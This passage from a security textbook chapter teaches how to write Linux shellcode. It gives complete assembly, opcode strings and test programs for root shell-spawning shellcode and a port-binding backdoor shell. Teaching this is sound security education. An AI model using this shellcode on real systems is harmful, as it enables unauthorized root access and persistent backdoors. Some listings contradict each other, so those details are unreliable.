The next thing to consider is what you intend to do once you have code running within
the kernel. Unlike with user space, you certainly can’t do an execve and replace the current
process (the kernel in this case) with a process more to your liking. Also unlike with user
space, you will not have access to a large catalog of shared libraries from which to choose
functions that are useful to you. The notion of a system call ceases to exist in kernel space,
as code running in kernel space is already in “the system.” The only functions that you will
have access to initially will be those exported by the kernel. The interface to those functions
may ormay not be published, depending on the operating system that you are dealing
with. An excellent source of information on the Windows kernel programming
interface is Gary Nebbett’s book Windows NT/2000 Native API Reference. Once you are
familiar with the native Windows API, you will still be faced with the problem of locating
all of the functions that you wish to make use of. In the case of the Windows kernel, techniques
similar to those used for locating functions in user space can be employed, as the
Windows kernel (ntoskrnl.exe) is itself a Portable Executable (PE) file.
Stability becomes a huge concern when developing kernel level exploits. As mentioned
previously, one wrongmove in the kernel can bring down the entire system. Any shellcode
you use will need to take into account the effect your exploit will have on the thread that
you exploited. If the thread crashes or becomes unresponsive, the entire system may soon
follow. Proper cleanup is a very important piece of any kernel exploit. Another factor that
will influence the stability of the system is the state of any interrupt processing being conducted
by the kernel at the time of the exploit. Interrupts may need to be reenabled or
reset cleanly in order to allow the system to continue stable operation.
Ultimately, you may decide that the somewhat more forgiving environment of user
space is a more desirable place to be running code. This is exactly what many recent kernel
exploits do. By scanning the process list, a process with sufficiently high privileges
can be selected as a host for a new thread that will contain attacker-supplied code. Kernel
API functions can then be utilized to initialize and launch the new thread, which
runs in the context of the selected process.
While the low level details of kernel level exploits are beyond the scope of this book,
the fact that this is a rapidly evolving area is likely to make kernel exploitation tools and
techniques more and more accessible to the average security researcher. In the meantime,
the references listed next will serve as excellent starting points for those interested
in more detailed coverage of the topic.
References
Barnaby Jack http://research.eeye.com/html/Papers/download/StepIntoTheRing.pdf
Bugcheck and Skape www.uninformed.org/?v=3&a=4&t=txt
Gary Nebbett, Windows NT/2000 Native API Reference, Indianapolis: Sams Publishing, 2000
Chapter 9: Shellcode Strategies
209
PART III
This page intentionally left blank
211
CHAPTER10 Writing Linux Shellcode
In this chapter,we will cover various aspects of Linux shellcode.
• Basic Linux Shellcode
• System Calls
• Exit System Call
• Setreuid System Call
• Shell-Spawning Shellcode with execve
• Implementing Port-Binding Shellcode
• Linux Socket Programming
• Assembly Program to Establish a Socket
• Test the Shellcode
• Implementing Reverse Connecting Shellcode
• Reverse Connecting C Program
• Reverse Connecting Assembly Program
• Encoding Shellcode
• Simple XOR Encoding
• Structure of Encoded Shellcode
• JMP/CALL XOR Decoder Example
• FNSTENV XOR Example
• Putting It All Together
• Automating Shellcode Generation with Metasploit
In the previous chapters, we used Aleph1’s ubiquitous shellcode. In this chapter, we will
learn to write our own. Although the previously shown shellcode works well in the examples,
the exercise of creating your own isworthwhile because there will be many situations
where the standard shellcode does not work and you will need to create your own.
Basic Linux Shellcode
The term “shellcode” refers to self-contained binary code that completes a task. The task
may range from issuing a system command to providing a shell back to the attacker, as
was the original purpose of shellcode.
There are basically three ways to write shellcode:
• Directly write the hex opcodes.
• Write a program in a high level language like C, compile it, and then disassemble
it to obtain the assembly instructions and hex opcodes.
• Write an assembly program, assemble the program, and then extract the hex
opcodes from the binary.
Writing the hex opcodes directly is a little extreme. We will start with learning the C
approach, but quickly move to writing assembly, then to extraction of the opcodes. In
any event, you will need to understand low level (kernel) functions such as read, write,
and execute. Since these system functions are performed at the kernel level, we will need
to learn a little about how user processes communicate with the kernel.
System Calls
The purpose of the operating system is to serve as a bridge between the user (process)
and the hardware. There are basically three ways to communicate with the operating system
kernel:
• Hardware interrupts For example, an asynchronous signal from the keyboard
• Hardware traps For example, the result of an illegal “divide by zero” error
• Software traps For example, the request for a process to be scheduled for
execution
Software traps are the most useful to ethical hackers because they provide a method
for the user process to communicate to the kernel. The kernel abstracts some basic system
level functions from the user and provides an interface through a system call.
Definitions for system calls can be found on a Linux system in the following file:
$cat /usr/include/asm/unistd.h
#ifndef _ASM_I386_UNISTD_H_
#define _ASM_I386_UNISTD_H_
#define __NR_exit 1
...snip...
#define __NR_execve 11
...snip...
#define __NR_setreuid 70
...snip...
#define __NR_dup2 99
...snip...
#define __NR_socketcall 102
...snip...
#define __NR_exit_group 252
...snip...
In the next section, we will begin the process, starting with C.
Gray Hat Hacking: The Ethical Hacker’s Handbook
212
System Calls by C
At a C level, the programmer simply uses the system call interface by referring to the
function signature and supplying the proper number of parameters. The simplest way to
find out the function signature is to look up the function’s man page.
For example, to learn more about the execve system call, you would type
$man 2 execve
This would display the following man page:
EXECVE(2) Linux Programmer's Manual EXECVE(2)
NAME
execve - execute program
SYNOPSIS
#include
int execve(const char *filename, char *const argv [], char
*const envp[]);
DESCRIPTION
execve() executes the program pointed to by filename. filename
must be either a binary executable, or a script starting with a line of the
form "#! interpreter [arg]". In the latter case, the interpreter must be a
valid pathname for an executable which is not itself a script, which will
be invoked as interpreter [arg] filename.
argv is an array of argument strings passed to the new program.
envp is an array of strings, conventionally of the form key=value, which
are passed as environment to the new program. Both, argv and envp must
be terminated by a NULL pointer. The argument vector and envi-execve()
does not return on success, and the text, data, bss, and stack of the
calling process are overwritten by that of the program loaded. The
program invoked inherits the calling process's PID, and any open file
descriptors that are not set to close on exec. Signals pending on the
calling process are cleared. Any signals set to be caught by the calling
process are reset to their default behaviour.
...snipped...
As the next section shows, the previous system call can be implemented directly with
assembly.
System Calls by Assembly
At an assembly level, the following registries are loaded to make a system call:
• eax Used to load the hex value of the system call (see unistd.h earlier)
• ebx Used for first parameter—ecx is used for second parameter, edx for third,
esi for fourth, and edi for fifth
If more than five parameters are required, an array of the parameters must be stored
in memory and the address of that array stored in ebx.
Once the registers are loaded, an int 0x80 assembly instruction is called to issue a
software interrupt, forcing the kernel to stop what it is doing and handle the interrupt.
The kernel first checks the parameters for correctness, then copies the register values to
kernel memory space and handles the interrupt by referring to the Interrupt Descriptor
Table (IDT).
Chapter 10: Writing Linux Shellcode
213
PART III
Gray Hat Hacking: The Ethical Hacker’s Handbook
214
The easiest way to understand this is to see an example, as in the next section.
Exit System Call
The first system call we will focus on executes exit(0). The signature of the exit system
call is as follows:
• eax 0x01 (from the unistd.h file earlier)
• ebx User-provided parameter (in this case 0)
Since this is our first attempt at writing system calls, we will start with C.
Starting with C
The following code will execute the function exit(0):
$ cat exit.c
#include
main(){
exit(0);
}
Go ahead and compile the program. Use the -static flag to compile in the library call to
exit as well.
$ gcc -static -o exit exit.c
NOTE If you receive the following error, you do not have the glibc-staticdevel
package installed on your system:
/usr/bin/ld: cannot find -lc
You can either install that rpm or try to remove the -static flag. Many recent
compilers will link in the exit call without the -static flag.
Now launch gdb in quiet mode (skip banner) with the -q flag. Start by setting a breakpoint
at the main function; then run the program with r. Finally, disassemble the _exit
function call with disass _exit.
$ gdb exit -q
(gdb) b main
Breakpoint 1 at 0x80481d6
(gdb) r
Starting program: /root/book/chapt11/exit
Breakpoint 1, 0x080481d6 in main ()
(gdb) disass _exit
Dump of assembler code for function _exit:
0x804c56c <_exit>: mov 0x4(%esp,1),%ebx
0x804c570 <_exit+4>: mov $0xfc,%eax
0x804c575 <_exit+9>: int $0x80
0x804c577 <_exit+11>: mov $0x1,%eax
0x804c57c <_exit+16>: int $0x80
0x804c57e <_exit+18>: hlt
0x804c57f <_exit+19>: nop
End of assembler dump.
(gdb) q
You can see that the function starts by loading our user argument into ebx (in our
case, 0). Next, line _exit+11 loads the value 0x1 into eax; then the interrupt (int $0x80)
is called at line _exit+16. Notice the compiler added a complimentary call to exit_group
(0xfc or syscall 252). The exit_group() call appears to be included to ensure that the
process leaves its containing thread group, but there is no documentation to be found
online. This was done by the wonderful people who packaged libc for this particular distribution
of Linux. In this case, that may have been appropriate—we cannot have extra
function calls introduced by the compiler for our shellcode. This is the reason that you
will need to learn to write your shellcode in assembly directly.
Move to Assembly
By looking at the preceding assembly, you will notice that there is no black magic here.
In fact, you could rewrite the exit(0) function call by simply using the assembly:
$cat exit.asm
section .text ; start code section of assembly
global _start
_start: ; keeps the linker from complaining or guessing
xor eax, eax ; shortcut to zero out the eax register (safely)
xor ebx, ebx ; shortcut to zero out the ebx register, see note
mov al, 0x01 ; only affects one bye, stops padding of other 24 bits
int 0x80 ; call kernel to execute syscall
We have left out the exit_group(0) syscall as it is not necessary.
Later it will become important that we eliminate NULL bytes from our hex opcodes,
as they will terminate strings prematurely.We have used the instruction mov al, 0x01 to
eliminate NULL bytes. The instruction move eax, 0x01 translates to hex B8 01 00 00 00
because the instruction automatically pads to 4 bytes. In our case, we only need to copy
1 byte, so the 8-bit equivalent of eax was used instead.
NOTE If you xor a number with itself, you get zero. This is preferable to
using something like move ax, 0, because that operation leads to NULL bytes
in the opcodes, which will terminate our shellcode when we place it into a
string.
In the next section, we will put the pieces together.
Assemble, Link, and Test
Once we have the assembly file, we can assemble it with nasm, link it with ld, then execute
the file as shown:
$nasm -f elf exit.asm
$ ld exit.o -o exit
$ ./exit
Not much happened, because we simply called exit(0), which exited the process
politely. Luckily for us, there is another way to verify.
Chapter 10: Writing Linux Shellcode
215
PART III
Gray Hat Hacking: The Ethical Hacker’s Handbook
216
Verify with strace
As in our previous example, you may need to verify the execution of a binary to ensure
the proper system calls were executed. The strace tool is helpful:
0
_exit(0) = ?
As we can see, the _exit(0) syscall was executed! Now let’s try another system call.
setreuid System Call
As discussed in Chapter 7, the target of our attack will often be an SUID program. However,
well-written SUID programs will drop the higher privileges when not needed. In
this case, it may be necessary to restore those privileges before taking control. The
setreuid system call is used to restore (set) the process’s real and effective user IDs.
setreuid Signature
Remember, the highest privilege to have is that of root (0). The signature of the
setreuid(0,0) system call is as follows:
• eax 0x46 for syscall # 70 (from unistd.h file earlier)
• ebx First parameter, real user ID (ruid), in this case 0x0
• ecx Second parameter, effective user ID (euid), in this case 0x0
This time, we will start directly with the assembly.
Starting with Assembly
The following assembly file will execute the setreuid(0,0) system call:
$ cat setreuid.asm
section .text ; start the code section of the asm
global _start ; declare a global label
_start: ; keeps the linker from complaining or guessing
xor eax, eax ; clear the eax registry, prepare for next line
mov al, 0x46 ; set the syscall value to decimal 70 or hex 46, one byte
xor ebx, ebx ; clear the ebx registry, set to 0
xor ecx, ecx ; clear the ecx registry, set to 0
int 0x80 ; call kernel to execute the syscall
mov al, 0x01 ; set the syscall number to 1 for exit()
int 0x80 ; call kernel to execute the syscall
As you can see, we simply load up the registers and call int 0x80. We finish the function
call with our exit(0) system call, which is simplified because ebx already contains
the value 0x0.
Chapter 10: Writing Linux Shellcode
217
PART III
Assemble, Link, and Test
As usual, assemble the source file with nasm, link the file with ld, then execute the
binary:
$ nasm -f elf setreuid.asm
$ ld -o setreuid setreuid.o
$ ./setreuid
Verify with strace
Once again, it is difficult to tell what the program did; strace to the rescue:
0
setreuid(0, 0) = 0
_exit(0) = ?
Ah, just as we expected!
Shell-Spawning Shellcode with execve
There are several ways to execute a program on Linux systems. One of the most widely
used methods is to call the execve system call. For our purpose, we will use execve to execute
the /bin/sh program.
execve Syscall
As discussed in the man page at the beginning of this chapter, if we wish to execute the
/bin/sh program, we need to call the system call as follows:
char * shell[2]; //set up a temp array of two strings
shell[0]="/bin/sh"; //set the first element of the array to "/bin/sh"
shell[1]="0"; //set the second element to NULL
execve(shell[0], shell , NULL) //actual call of execve
where the second parameter is a two-element array containing the string “/bin/sh” and
terminated with a NULL. Therefore, the signature of the execve(“/bin/sh”, [“/bin/sh”,
NULL], NULL) syscall is as follows:
• eax 0xb for syscall #11 (actually al:0xb to remove NULLs from opcodes)
• ebx The char * address of /bin/sh somewhere in accessible memory
• ecx The char * argv[], an address (to an array of strings) starting with the
address of the previously used /bin/sh and terminated with a NULL
• edx Simply a 0x0, since the char * env[] argument may be NULL
The only tricky part here is the construction of the “/bin/sh” string and the use of its
address. We will use a clever trick by placing the string on the stack in two chunks and
then referencing the address of the stack to build the register values.
Starting with Assembly
The following assembly code executes setreuid(0,0), then calls execve “/bin/sh”:
$ cat sc2.asm
section .text ; start the code section of the asm
global _start ; declare a global label
_start: ; get in the habit of using code labels
;setreuid (0,0) ; as we have already seen…
xor eax, eax ; clear the eax registry, prepare for next line
mov al, 0x46 ; set the syscall # to decimal 70 or hex 46, one byte
xor ebx, ebx ; clear the ebx registry
xor ecx, ecx ; clear the exc registry
int 0x80 ; call the kernel to execute the syscall
;spawn shellcode with execve
xor eax, eax ; clears the eax registry, sets to 0
push eax ; push a NULL value on the stack, value of eax
push 0x68732f2f ; push '//sh' onto the stack, padded with leading '/'
push 0x6e69622f ; push /bin onto the stack, notice strings in reverse
mov ebx, esp ; since esp now points to "/bin/sh", write to ebx
push eax ; eax is still NULL, let's terminate char ** argv on stack
push ebx ; still need a pointer to the address of '/bin/sh', use ebx
mov ecx, esp ; now esp holds the address of argv, move it to ecx
xor edx, edx ; set edx to zero (NULL), not needed
mov al, 0xb ; set the syscall # to decimal 11 or hex b, one byte
int 0x80 ; call the kernel to execute the syscall
As just shown, the /bin/sh string is pushed onto the stack in reverse order by first
pushing the terminating NULL value of the string, next by pushing the //sh (4 bytes are
required for alignment and the second / has no effect). Finally, the /bin is pushed onto
the stack. At this point, we have all that we need on the stack, so esp now points to the
location of /bin/sh. The rest is simply an elegant use of the stack and register values to
set up the arguments of the execve system call.
Assemble, Link, and Test
Let’s check our shellcode by assembling with nasm, linking with ld, making the program
an SUID, and then executing it:
$ nasm -f elf sc2.asm
$ ld -o sc2 sc2.o
$ sudo chown root sc2
$ sudo chmod +s sc2
$ ./sc2
sh-2.05b# exit
Wow! It worked!
Extracting the Hex Opcodes (Shellcode)
Remember, to use our new program within an exploit, we need to place our program
inside a string. To obtain the hex opcodes, we simply use the objdump tool with the -d
flag for disassembly:
Gray Hat Hacking: The Ethical Hacker’s Handbook
218
$ objdump -d ./sc2
./sc2: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: 31 c0 xor %eax,%eax
8048082: b0 46 mov $Ox46,%al
8048084: 31 db xor %ebx,%ebx
8048086: 31 c9 xor %ecx,%ecx
8048088: cd 80 int $Ox80
804808a: 31 c0 xor %eax,%eax
804808c: 50 push %eax
804808d: 68 2f 2f 73 68 push $Ox68732f2f
8048092: 68 2f 62 69 6e push $Ox6e69622f
8048097: 89 e3 mov %esp,%ebx
8048099: 50 push %eax
804809a: 53 push %ebx
804809b: 89 e1 mov %esp,%ecx
804809d: 31 d2 xor %edx,%edx
804809f: b0 0b mov $Oxb,%al
80480a1: cd 80 int $Ox80
$
The most important thing about this printout is to verify that no NULL characters
(\x00) are present in the hex opcodes. If there are any NULL characters, the shellcode
will fail when we place it into a string for injection during an exploit.
NOTE The output of objdump is provided in AT&T (gas) format. As
discussed in Chapter 6,we can easily convert between the two formats (gas
and nasm). A close comparison between the code we wrote and the
provided gas format assembly shows no difference.
Testing the Shellcode
To ensure that our shellcode will execute when contained in a string, we can craft the following
test program. Notice how the string (sc) may be broken into separate lines, one
for each assembly instruction. This aids with understanding and is a good habit to get
into.
$ cat sc2.c
char sc[] = //white space, such as carriage returns don't matter
// setreuid(0,0)
"\x31\xc0" // xor %eax,%eax
"\xb0\x46" // mov $0x46,%al
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\xcd\x80" // int $0x80
// spawn shellcode with execve
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x50" // push %eax
"\x53" // push %ebx
"\x89\xe1" // mov %esp,%ecx
Chapter 10: Writing Linux Shellcode
219
PART III
Gray Hat Hacking: The Ethical Hacker’s Handbook
220
"\x31\xd2" // xor %edx,%edx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80"; // int $0x80 (;)terminates the string
main()
{
void (*fp) (void); // declare a function pointer, fp
fp = (void *)sc; // set the address of fp to our shellcode
fp(); // execute the function (our shellcode)
}
This program first places the hex opcodes (shellcode) into a buffer called sc[]. Next
the main function allocates a function pointer called fp (simply a 4-byte integer that
serves as an address pointer, used to point at a function). The function pointer is then set
to the starting address of sc[]. Finally, the function (our shellcode) is executed.
Now compile and test the code:
$ gcc -o sc2 sc2.c
$ sudo chown root sc2
$ sudo chmod +s sc2
$ ./sc2
sh-2.05b# exit
exit
As expected, the same results are obtained. Congratulations, you can now write your
own shellcode!
References
Aleph One, “Smashing the Stack” www.phrack.org/archives/49/P49-14
Murat Balaban, Shellcode Demystified www.enderunix.org/docs/en/sc-en.txt
Jon Erickson, Hacking: The Art of Exploitation (San Francisco: No Starch Press, 2003)
Koziol et al., The Shellcoder’s Handbook (Indianapolis: Wiley Publishing, 2004)
Implementing Port-Binding Shellcode
As discussed in the last chapter, sometimes it is helpful to have your shellcode open a
port and bind a shell to that port. This allows the attacker to no longer rely on the port
that entry was gained on and provides a solid backdoor into the system.
Linux Socket Programming
Linux socket programming deserves a chapter to itself, if not an entire book. However, it
turns out that there are just a few things you need to know to get off the ground. The
finer details of Linux socket programming are beyond the scope of this book, but here
goes the short version. Buckle up again!
C Program to Establish a Socket
In C, the following header files need to be included into your source code to build
sockets:
#include
#include
The first concept to understand when building sockets is byte order.
IP Networks Use Network Byte Order
As we learned before, when programming on Linux systems, we need to understand that
data is stored into memory by writing the lower-order bytes first; this is called littleendian
notation. Just when you got used to that, you need to understand that IP networks
work by writing the high-order byte first; this is referred to as network byte order. In
practice, this is not difficult to work around. You simply need to remember that bytes
will be reversed into network byte order prior to being sent down the wire.
The second concept to understand when building sockets is the sockaddr structure.
sockaddr Structure
In C programs, structures are used to define an object that has characteristics contained
in variables. These characteristics or variables may be modified and the object may be
passed as an argument to functions. The basic structure used in building sockets is called
a sockaddr. The sockaddr looks like this:
struct sockaddr {
unsigned short sa_family; /*address family*/
char sa_data[14]; /*address data*/
};
The basic idea is to build a chunk of memory that holds all the critical information of
the socket, namely the type of address family used (in our case IP, Internet Protocol), the
IP address, and the port to be used. The last two elements are stored in the sa_data field.
To assist in referencing the fields of the structure, a more recent version of sockaddr
was developed: sockaddr_in. The sockaddr_in structure looks like this:
struct sockaddr_in {
short int sin_family /* Address family */
unsigned short int sin_port; /* Port number */
struct in_addr sin_addr; /* Internet address */
unsigned char sin_zero[8]; /* 8 bytes of NULL padding for IP */
};
The first three fields of this structure must be defined by the user prior to establishing
a socket. We will be using an address family of 0x2, which corresponds to IP (network
byte order). Port number is simply the hex representation of the port used. The Internet
address is obtained by writing the octets of the IP (each in hex notation) in reverse order,
starting with the fourth octet. For example, 127.0.0.1 would be written 0x0100007F. The
value of 0 in the sin_addr field simply means for all local addresses. The sin_zero field
pads the size of the structure by adding 8 NULL bytes. This may all sound intimidating,
Chapter 10: Writing Linux Shellcode
221
PART III
Gray Hat Hacking: The Ethical Hacker’s Handbook
222
but in practice, we only need to know that the structure is a chunk of memory used to
store the address family type, port, and IP address. Soon we will simply use the stack to
build this chunk of memory.
Sockets
Sockets are defined as the binding of a port and an IP to a process. In our case, we will
most often be interested in binding a command shell process to a particular port and IP
on a system.
The basic steps to establish a socket are as follows (including C function calls):
1. Build a basic IP socket:
server=socket(2,1,0)
2. Build a sockaddr_in structure with IP and port:
struct sockaddr_in serv_addr; //structure to hold IP/port vals
serv_addr.sin_addr.s_addr=0;//set addresses of socket to all localhost IPs
serv_addr.sin_port=0xBBBB;//set port of socket, in this case to 48059
serv_addr.sin_family=2; //set native protocol family: IP
3. Bind the port and IP to the socket:
bind(server,(struct sockaddr *)&serv_addr,0x10)
4. Start the socket in listen mode; open the port and wait for a connection:
listen(server, 0)
5. When a connection is made, return a handle to the client:
client=accept(server, 0, 0)
6. Copy stdin, stdout, and stderr pipes to the connecting client:
dup2(client, 0), dup2(client, 1), dup2(client, 2)
7. Call normal execve shellcode, as in the first section of this chapter:
char * shell[2]; //set up a temp array of two strings
shell[0]="/bin/sh"; //set the first element of the array to "/bin/sh"
shell[1]="0"; //set the second element to NULL
execve(shell[0], shell , NULL) //actual call of execve
port_bind.c
To demonstrate the building of sockets, let’s start with a basic C program:
$ cat ./port_bind.c
#include
#include
int main(){
char * shell[2]; //prep for execve call
int server,client; //file descriptor handles
struct sockaddr_in serv_addr; //structure to hold IP/port vals
server=socket(2,1,0); //build a local IP socket of type stream
serv_addr.sin_addr.s_addr=0;//set addresses of socket to all local
serv_addr.sin_port=0xBBBB;//set port of socket, 48059 here
serv_addr.sin_family=2; //set native protocol family: IP
bind(server,(struct sockaddr *)&serv_addr,0x10); //bind socket
listen(server,0); //enter listen state, wait for connect
client=accept(server,0,0);//when connect, return client handle
/*connect client pipes to stdin,stdout,stderr */
dup2(client,0); //connect stdin to client
dup2(client,1); //connect stdout to client
dup2(client,2); //connect stderr to client
shell[0]="/bin/sh"; //first argument to execve
shell[1]=0; //terminate array with NULL
execve(shell[0],shell,0); //pop a shell
}
This program sets up some variables for use later to include the sockaddr_in structure.
The socket is initialized and the handle is returned into the server pointer (int
serves as a handle). Next the characteristics of the sockaddr_in structure are set. The
sockaddr_in structure is passed along with the handle to the server to the bind function
(which binds the process, port, and IP together). Then the socket is placed in the listen
state, meaning it waits for a connection on the bound port. When a connection is made,
the program passes a handle to the socket to the client handle. This is done so the stdin,
stdout, and stderr of the server can be duplicated to the client, allowing the client to
communicate with the server. Finally, a shell is popped and returned to the client.
Assembly Program to Establish a Socket
To summarize the previous section, the basic steps to establish a socket are
• server=socket(2,1,0)
• bind(server,(struct sockaddr *)&serv_addr,0x10)
• listen(server, 0)
• client=accept(server, 0, 0)
• dup2(client, 0), dup2(client, 1), dup2(client, 2)
• execve “/bin/sh”
There is only one more thing to understand before moving to the assembly.
socketcall System Call
In Linux, sockets are implemented by using the socketcall system call (102). The
socketcall system call takes two arguments:
• ebx An integer value, defined in /usr/include/net.h
To build a basic socket, you will only need
• SYS_SOCKET 1
• SYS_BIND 2
Chapter 10: Writing Linux Shellcode
223
PART III
• SYS_CONNECT 3
• SYS_LISTEN 4
• SYS_ACCEPT 5
• ecx A pointer to an array of arguments for the particular function
Believe it or not, you now have all you need to jump into assembly socket programs.
port_bind_asm.asm
Armed with this info, we are ready to start building the assembly of a basic program to
bind the port 48059 to the localhost IP and wait for connections. Once a connection is
gained, the program will spawn a shell and provide it to the connecting client.
NOTE The following code segment can seem intimidating, but it is quite
simple. Refer back to the previous sections, in particular the last section, and
realize that we are just implementing the system calls (one after another).
# cat ./port_bind_asm.asm
BITS 32
section .text
global _start
_start:
xor eax,eax ;clear eax
xor ebx,ebx ;clear ebx
xor edx,edx ;clear edx
;server=socket(2,1,0)
push eax ; third arg to socket: 0
push byte 0x1 ; second arg to socket: 1
push byte 0x2 ; first arg to socket: 2
mov ecx,esp ; set addr of array as 2nd arg to socketcall
inc bl ; set first arg to socketcall to # 1
mov al,102 ; call socketcall # 1: SYS_SOCKET
int 0x80 ; jump into kernel mode, execute the syscall
mov esi,eax ; store the return value (eax) into esi (server)
;bind(server,(struct sockaddr *)&serv_addr,0x10)
push edx ; still zero, terminate the next value pushed
push long 0xBBBB02BB ; build struct:port,sin.family:02,& any 2bytes:BB
mov ecx,esp ; move addr struct (on stack) to ecx
push byte 0x10 ; begin the bind args, push 16 (size) on stack
push ecx ; save address of struct back on stack
push esi ; save server file descriptor (now in esi) to stack
mov ecx,esp ; set addr of array as 2nd arg to socketcall
inc bl ; set bl to # 2, first arg of socketcall
mov al,102 ; call socketcall # 2: SYS_BIND
int 0x80 ; jump into kernel mode, execute the syscall
;listen(server, 0)
push edx ; still zero, used to terminate the next value pushed
push esi ; file descriptor for server (esi) pushed to stack
mov ecx,esp ; set addr of array as 2nd arg to socketcall
Gray Hat Hacking: The Ethical Hacker’s Handbook
224
mov bl,0x4 ; move 4 into bl, first arg of socketcall
mov al,102 ; call socketcall #4: SYS_LISTEN
int 0x80 ; jump into kernel mode, execute the syscall
;client=accept(server, 0, 0)
push edx ; still zero, third argument to accept pushed to stack
push edx ; still zero, second argument to accept pushed to stack
push esi ; saved file descriptor for server pushed to stack
mov ecx,esp ; args placed into ecx, serves as 2nd arg to socketcall
inc bl ; increment bl to 5, first arg of socketcall
mov al,102 ; call socketcall #5: SYS_ACCEPT
int 0x80 ; jump into kernel mode, execute the syscall
; prepare for dup2 commands, need client file handle saved in ebx
mov ebx,eax ; copied returned file descriptor of client to ebx
;dup2(client, 0)
xor ecx,ecx ; clear ecx
mov al,63 ; set first arg of syscall to 0x63: dup2
int 0x80 ; jump into
;dup2(client, 1)
inc ecx ; increment ecx to 1
mov al,63 ; prepare for syscall to dup2:63
int 0x80 ; jump into
;dup2(client, 2)
inc ecx ; increment ecx to 2
mov al,63 ; prepare for syscall to dup2:63
int 0x80 ; jump into
;standard execve("/bin/sh"...
push edx
push long 0x68732f2f
push long 0x6e69622f
mov ebx,esp
push edx
push ebx
mov ecx,esp
mov al, 0x0b
int 0x80
#
Thatwas quite a long piece of assembly, but you should be able to followit by now.
NOTE Port 0xBBBB = decimal 48059. Feel free to change this value and
connect to any free port you like.
Assemble the source file, link the program, and execute the binary.
# nasm -f elf port_bind_asm.asm
# ld -o port_bind_asm port_bind_asm.o
# ./port_bind_asm
Chapter 10: Writing Linux Shellcode
225
PART III
At this point, we should have an open port: 48059. Let’s open another command
shell and check:
# netstat -pan |grep port_bind_asm
tcp 0 0 0.0.0.0:48059 0.0.0.0:* LISTEN
10656/port_bind
Looks good; now fire up netcat, connect to the socket, and issue a test command.
# nc localhost 48059
id
uid=0(root) gid=0(root) groups=0(root)
Yep, it worked as planned. Smile and pat yourself on the back; you earned it.
Test the Shellcode
Finally, we get to the port binding shellcode. We need to carefully extract the hex
opcodes and then test them by placing the shellcode into a string and executing it.
Extracting the Hex Opcodes
Once again, we fall back on using the objdump tool:
$objdump -d ./port_bind_asm
port_bind: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: 31 c0 xor %eax,%eax
8048082: 31 db xor %ebx,%ebx
8048084: 31 d2 xor %edx,%edx
8048086: 50 push %eax
8048087: 6a 01 push $0x1
8048089: 6a 02 push $0x2
804808b: 89 e1 mov %esp,%ecx
804808d: fe c3 inc %bl
804808f: b0 66 mov $0x66,%al
8048091: cd 80 int $0x80
8048093: 89 c6 mov %eax,%esi
8048095: 52 push %edx
8048096: 68 aa 02 aa aa push $0xaaaa02aa
804809b: 89 e1 mov %esp,%ecx
804809d: 6a 10 push $0x10
804809f: 51 push %ecx
80480a0: 56 push %esi
80480a1: 89 e1 mov %esp,%ecx
80480a3: fe c3 inc %bl
80480a5: b0 66 mov $0x66,%al
80480a7: cd 80 int $0x80
80480a9: 52 push %edx
80480aa: 56 push %esi
80480ab: 89 e1 mov %esp,%ecx
80480ad: b3 04 mov $0x4,%bl
80480af: b0 66 mov $0x66,%al
80480b1: cd 80 int $0x80
Gray Hat Hacking: The Ethical Hacker’s Handbook
226
80480b3: 52 push %edx
80480b4: 52 push %edx
80480b5: 56 push %esi
80480b6: 89 e1 mov %esp,%ecx
80480b8: fe c3 inc %bl
80480ba: b0 66 mov $0x66,%al
80480bc: cd 80 int $0x80
80480be: 89 c3 mov %eax,%ebx
80480c0: 31 c9 xor %ecx,%ecx
80480c2: b0 3f mov $0x3f,%al
80480c4: cd 80 int $0x80
80480c6: 41 inc %ecx
80480c7: b0 3f mov $0x3f,%al
80480c9: cd 80 int $0x80
80480cb: 41 inc %ecx
80480cc: b0 3f mov $0x3f,%al
80480ce: cd 80 int $0x80
80480d0: 52 push %edx
80480d1: 68 2f 2f 73 68 push $0x68732f2f
80480d6: 68 2f 62 69 6e push $0x6e69622f
80480db: 89 e3 mov %esp,%ebx
80480dd: 52 push %edx
80480de: 53 push %ebx
80480df: 89 e1 mov %esp,%ecx
80480e1: b0 0b mov $0xb,%al
80480e3: cd 80 int $0x80
A visual inspection verifies that we have no NULL characters (\x00), so we should be
good to go. Now fire up your favorite editor (hopefully vi) and turn the opcodes into
shellcode.
port_bind_sc.c
Once again, to test the shellcode, we will place it into a string and run a simple test program
to execute the shellcode:
# cat port_bind_sc.c
char sc[]= // our new port binding shellcode, all here to save pages
"\x31\xc0\x31\xdb\x31\xd2\x50\x6a\x01\x6a\x02\x89\xe1\xfe\xc3\xb0"
"\x66\xcd\x80\x89\xc6\x52\x68\xbb\x02\xbb\xbb\x89\xe1\x6a\x10\x51"
"\x56\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x52\x56\x89\xe1\xb3\x04\xb0"
"\x66\xcd\x80\x52\x52\x56\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89\xc3"
"\x31\xc9\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80"
"\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
"\xe1\xb0\x0b\xcd\x80";
main(){
void (*fp) (void); // declare a function pointer, fp
fp = (void *)sc; // set the address of the fp to our shellcode
fp(); // execute the function (our shellcode)
}
Compile the program and start it:
# gcc -o port_bind_sc port_bind_sc.c
# ./port_bind_sc
Chapter 10: Writing Linux Shellcode
227
PART III
In another shell, verify the socket is listening. Recall, we used the port 0xBBBB in our
shellcode, so we should see port 48059 open.
# netstat -pan |grep port_bind_sc
tcp 0 0 0.0.0.0:48059 0.0.0.0:* LISTEN
21326/port_bind_sc
CAUTION When testing this program and the others in this chapter, if you
run them repeatedly, you may get a state of TIME WAIT or FIN WAIT. You
will need to wait for internal kernel TCP timers to expire, or simply change
the port to another one if you are impatient.
Finally, switch to a normal user and connect:
# su joeuser
$ nc localhost 48059
id
uid=0(root) gid=0(root) groups=0(root)
exit
$
Success!
References
Smiler, “Writing Shellcode” http://community.corest.com/~juliano/art-shellcode.txt
Zillion, “Writing Shellcode” www.safemode.org/files/zillion/shellcode/doc/Writing_
shellcode.html
